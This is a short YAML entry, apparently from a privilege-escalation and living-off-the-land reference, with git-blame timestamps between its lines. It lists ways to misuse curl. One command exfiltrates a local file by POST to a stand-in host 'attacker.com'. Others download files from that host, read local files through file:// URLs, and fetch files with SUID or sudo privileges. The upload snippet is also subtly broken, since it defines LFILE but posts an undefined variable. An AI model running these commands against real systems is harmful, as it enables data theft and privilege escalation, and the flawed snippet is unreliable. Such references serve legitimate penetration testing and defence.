2018-05-21 21:14:41 +02:00
|
|
|
---
|
|
|
|
functions:
|
|
|
|
upload:
|
2018-07-16 15:01:50 +02:00
|
|
|
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
|
|
|
code: |
|
|
|
|
URL=http://attacker.com/
|
|
|
|
LFILE=file_to_send
|
|
|
|
curl -X POST -d @$file_to_send $URL
|
2018-05-21 21:14:41 +02:00
|
|
|
download:
|
2018-07-16 15:01:50 +02:00
|
|
|
- description: Fetch a remote file via HTTP GET request.
|
|
|
|
code: |
|
|
|
|
URL=http://attacker.com/file_to_get
|
|
|
|
LFILE=file_to_save
|
|
|
|
curl $URL -o $LFILE
|
2018-06-10 10:49:59 +02:00
|
|
|
file-read:
|
2018-07-16 15:01:50 +02:00
|
|
|
- description: The file path must be absolute.
|
|
|
|
code: |
|
|
|
|
LFILE=/tmp/file_to_read
|
|
|
|
curl file://$LFILE
|
2018-07-22 15:30:03 +02:00
|
|
|
suid-enabled:
|
|
|
|
- description: Fetch a remote file via HTTP GET request.
|
|
|
|
code: |
|
|
|
|
URL=http://attacker.com/file_to_get
|
|
|
|
LFILE=file_to_save
|
|
|
|
./curl $URL -o $LFILE
|
|
|
|
sudo-enabled:
|
|
|
|
- description: Fetch a remote file via HTTP GET request.
|
|
|
|
code: |
|
|
|
|
URL=http://attacker.com/file_to_get
|
|
|
|
LFILE=file_to_save
|
|
|
|
sudo -E curl $URL -o $LFILE
|
2018-05-25 01:10:39 +02:00
|
|
|
---
|